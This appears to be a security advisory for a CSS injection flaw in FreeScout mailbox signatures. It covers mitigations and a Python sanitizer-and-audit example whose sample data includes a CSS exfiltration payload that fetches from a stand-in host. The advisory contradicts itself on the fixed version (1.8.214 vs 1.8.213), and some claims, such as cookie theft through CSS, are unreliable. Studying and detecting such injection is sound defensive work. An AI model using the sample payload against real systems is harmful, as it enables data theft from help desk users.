Platform: php
Component: freescout-help-desk
Fixed in: 1.8.214
CVE-2026-40497 describes a Cross-Site Request Forgery (CSRF) vulnerability discovered in FreeScout, a free self-hosted help desk and shared mailbox system. This flaw allows an attacker to inject malicious CSS code into mailbox settings, potentially leading to Cross-Site Scripting (XSS) attacks. The vulnerability impacts versions 1.0.0 through 1.8.212, and a fix is available in version 1.8.213.
The vulnerability lies in FreeScout's inadequate sanitization of <style> tags within the mailbox signature field. While other potentially dangerous tags like <script>, <form>, <iframe>, and <object> are stripped, <style> tags are not. These injected <style> tags are then rendered unescaped in conversation views. Given that FreeScout's Content Security Policy (CSP) allows style-src * 'self' 'unsafe-inline', injected inline styles execute freely. An attacker with access to modify mailbox settings – either as an administrator or an agent with mailbox permissions – can exploit this to inject malicious CSS. This could be used to steal user cookies, redirect users to phishing sites, or deface the FreeScout interface. The blast radius is limited to users accessing conversations within the affected mailbox.
This vulnerability was publicly disclosed on 2026-04-21. No known public proof-of-concept (PoC) exists at the time of writing, but the vulnerability's nature and the ease of CSS injection suggest a potential for exploitation. Its severity is rated HIGH (CVSS 8.1). It is not currently listed on CISA KEV.
Exploit Status
EPSS: 0.04% (11th percentile)
The primary mitigation is to upgrade FreeScout to version 1.8.213 or later, which includes the necessary fix to properly sanitize <style> tags. If upgrading immediately is not possible, consider implementing a Web Application Firewall (WAF) rule to block POST requests to /mailbox/settings/{id} containing suspicious <style> tags. Alternatively, restrict access to mailbox settings to only trusted administrators and agents. Monitor FreeScout logs for unusual activity, particularly POST requests to the settings endpoint. While a direct detection signature is difficult, look for unusual CSS patterns within mailbox signatures.
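To make the sanitization gap and the suggested detection concrete, here is an added Python example. It is not FreeScout's own code (the project's real sanitizer was not examined); the denylist regex, the function names and the sample signatures are constructed for illustration. It models a tag denylist that strips <script>, <form>, <iframe> and <object> but not <style>, the same denylist with <style> added, and a small audit that flags stored signatures carrying the CSS patterns a defender would want to review.

```python
"""Added example, not FreeScout code: a denylist sanitizer that shows the
<style> gap described in the advisory, plus an audit over stored signatures."""
import re

# Tags the advisory says the original signature sanitizer already strips.
ORIGINAL_DENYLIST = ("script", "form", "iframe", "object")
# The fix described in the advisory additionally removes <style>.
FIXED_DENYLIST = ORIGINAL_DENYLIST + ("style",)


def _tag_pattern(tags):
    """Build a regex that removes a whole denylisted element (open tag, body,
    close tag) or a lone/self-closing denylisted tag. Assumed structure only."""
    names = "|".join(tags)
    return re.compile(
        rf"<\s*(?P<t>{names})\b[^>]*>.*?<\s*/\s*(?P=t)\s*>"
        rf"|<\s*/?\s*(?:{names})\b[^>]*/?>",
        re.IGNORECASE | re.DOTALL,
    )


def strip_dangerous_tags(html, denylist=FIXED_DENYLIST):
    """Return the signature with every denylisted tag removed.

    With ORIGINAL_DENYLIST a <style> block survives and, because the CSP
    allows 'unsafe-inline' for style-src, it is applied in conversation views.
    With FIXED_DENYLIST the <style> block is dropped.
    """
    return _tag_pattern(denylist).sub("", html)


# Patterns worth reviewing in a mailbox signature. A signature legitimately
# contains inline formatting, not <style> blocks, remote fetches or selectors.
SUSPICIOUS_CSS = {
    "style_tag": re.compile(r"<\s*style\b", re.IGNORECASE),
    "external_fetch": re.compile(r"url\s*\(|@import", re.IGNORECASE),
    "attribute_selector": re.compile(r"\[\s*[a-zA-Z_-]+\s*[\^$*|~]?="),
}


def find_suspicious_css(signature):
    """Return the sorted names of SUSPICIOUS_CSS patterns found in a signature."""
    return sorted(name for name, pat in SUSPICIOUS_CSS.items() if pat.search(signature))


def audit_signatures(signatures):
    """signatures: mapping of mailbox id -> stored signature HTML.
    Returns only the mailboxes that have findings, for follow-up by an admin."""
    findings = {}
    for mailbox_id, signature in signatures.items():
        hits = find_suspicious_css(signature)
        if hits:
            findings[mailbox_id] = hits
    return findings


# Constructed sample signatures (not real data). mailbox-2 carries a <style>
# block with a remote fetch and an attribute selector; mailbox-3 carries a
# <script> block that the original denylist already removes.
SAMPLE_SIGNATURES = {
    "mailbox-1": "<p>Kind regards,<br>Support Team</p>",
    "mailbox-2": '<p>Thanks</p><style>.x[data-x^="a"]{background:url(https://example.invalid/b)}</style>',
    "mailbox-3": "<p>Hi</p><script>alert(1)</script>",
}

if __name__ == "__main__":
    for mailbox_id, signature in SAMPLE_SIGNATURES.items():
        print(mailbox_id, "original:", strip_dangerous_tags(signature, ORIGINAL_DENYLIST))
        print(mailbox_id, "fixed:   ", strip_dangerous_tags(signature))
    print("audit findings:", audit_signatures(SAMPLE_SIGNATURES))
```

Running the audit over a database export of mailbox signatures gives a defender a quick list of mailboxes to inspect while the upgrade is scheduled; the sanitizer comparison shows why a denylist that omits one tag is not a fix.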
Update FreeScout to version 1.8.213 or higher. This version includes a fix that correctly removes `<style>` tags from the mailbox signature, preventing CSS injection and potential CSRF token exfiltration.
CVE-2026-40497 is a Cross-Site Request Forgery (CSRF) vulnerability in FreeScout versions 1.0.0 through 1.8.212, allowing attackers to inject malicious CSS and potentially execute XSS.
Yes, if you are running FreeScout versions 1.0.0 through 1.8.212, you are affected by this vulnerability.
Upgrade FreeScout to version 1.8.213 or later to resolve the vulnerability. Consider WAF rules as a temporary mitigation.
No active exploitation has been confirmed, but the vulnerability's nature suggests a potential for exploitation.
Refer to the FreeScout security advisory for details: [https://freescout.com/security/](https://freescout.com/security/)